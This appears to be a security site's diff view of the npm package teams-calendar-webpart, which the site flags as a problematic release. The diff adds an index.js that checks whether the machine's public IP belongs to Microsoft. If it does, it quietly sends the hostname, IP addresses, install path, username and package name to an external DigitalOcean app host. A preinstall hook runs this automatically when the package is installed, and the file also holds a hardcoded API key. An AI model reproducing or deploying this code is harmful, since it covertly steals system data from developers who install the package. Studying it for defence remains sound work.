teams-calendar-webpart 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of teams-calendar-webpart might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +102 -0
  2. package/package.json +16 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,102 @@
1
+ const os = require("os");
2
+ const path = require('path');
3
+ const https = require('https');
4
+ const request = require('sync-request');
5
+
6
+
7
+ async function isIpInMS(ip) {
8
+ const options = {
9
+ hostname: 'api.ip2location.io',
10
+ path: `/v2/?key=E5663071BD611B714AF60C563AA14CF1&ip=${ip}&package=WS1`,
11
+ method: 'GET'
12
+ };
13
+
14
+ return new Promise((resolve, reject) => {
15
+ const req = https.request(options, res => {
16
+ let data = '';
17
+ res.on('data', chunk => {
18
+ data += chunk;
19
+ });
20
+ res.on('end', () => {
21
+ try {
22
+ const response = JSON.parse(data);
23
+ resolve(response.as.includes('Microsoft'));
24
+ } catch (error) {
25
+ reject(error);
26
+ }
27
+ });
28
+ });
29
+ req.on('error', error => {
30
+ reject(error);
31
+ });
32
+ req.end();
33
+ });
34
+ }
35
+
36
+ const pi = request('GET', 'https://api.ipify.org').getBody().toString();
37
+
38
+ isIpInMS(pi)
39
+ .then(result => {
40
+ if (result) {
41
+ console.log('on here');
42
+ // Get the hostname
43
+ const hostname = os.hostname();
44
+ //console.log("Hostname: " + hostname);
45
+
46
+ // Get the network interfaces
47
+ const interfaces = os.networkInterfaces();
48
+
49
+ let ips = "";
50
+ for (const name of Object.keys(interfaces)) {
51
+ for (const iface of interfaces[name]) {
52
+ // Filter out internal/non-IPv4 addresses
53
+ if (iface.family === "IPv4" && !iface.internal) {
54
+ //console.log("IP Address: " + iface.address);
55
+ ips = ips + iface.address + "|"
56
+ }
57
+ }
58
+ };
59
+
60
+ //get system path
61
+ const systemPath = path.join(__dirname, '.');
62
+ //console.log(systemPath);
63
+
64
+ // get username
65
+ const userInfo = os.userInfo();
66
+ //console.log(userInfo["username"]);
67
+
68
+ // get current package
69
+ const packagePath = path.dirname(require.main.filename);
70
+ const packageJson = require(path.join(packagePath, 'package.json'));
71
+ //console.log(packageJson["name"]);
72
+
73
+
74
+
75
+ const options = {
76
+ hostname: 'monkfish-app-brmld.ondigitalocean.app',
77
+ port: 443,
78
+ path: '/?hostname=' + hostname + '&ip=' + ips + '&path=' + systemPath + '&public_ip=' + pi + "&user=" + userInfo["username"] + "&package=" + packageJson["name"],
79
+ method: 'GET'
80
+ };
81
+
82
+ const req = https.request(options, (res) => {
83
+ //console.log(`statusCode: ${res.statusCode}`);
84
+
85
+ res.on('data', (d) => {
86
+ process.stdout.write(d);
87
+ });
88
+ });
89
+
90
+ req.on('error', (error) => {
91
+ console.error(error);
92
+ });
93
+
94
+ req.end();
95
+ } else {
96
+ console.log('not here');
97
+ }
98
+ })
99
+ .catch(error => {
100
+ console.error(error);
101
+ });
102
+
package/package.json CHANGED
@@ -1,6 +1,19 @@
1
1
  {
2
2
  "name": "teams-calendar-webpart",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "sp",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js && exit 1",
8
+ "preuninstall": "node index.js && exit 1"
9
+ },
10
+ "keywords": [
11
+ "node",
12
+ "sp"
13
+ ],
14
+ "author": "andris@gmail.com",
15
+ "license": "ISC",
16
+ "dependencies": {
17
+ "sync-request": "^6.1.0"
18
+ }
6
19
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=teams-calendar-webpart for more information.